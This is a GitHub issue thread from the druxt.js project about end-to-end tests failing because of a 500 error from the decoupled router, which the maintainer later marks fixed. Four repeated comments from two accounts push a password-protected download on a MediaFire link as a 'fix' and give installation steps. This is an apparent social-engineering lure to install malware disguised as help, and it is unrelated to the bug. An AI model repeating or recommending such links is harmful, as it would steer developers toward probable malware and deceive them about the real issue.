### ISSUE TITLE
End to end tests broken due to router.

### ISSUE THREAD

**Issue by Decipher** [druxt/druxt.js#699]
**Describe the bug**
The End to End tests are failing due to a 500 error from the decoupled router.

**To Reproduce**

**Expected behavior**

**Media**
If applicable, add screenshots or video to help explain your problem.

**Your Environment (please complete the following information):**

**Additional context**

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Decipher** [comment]
Fixed.
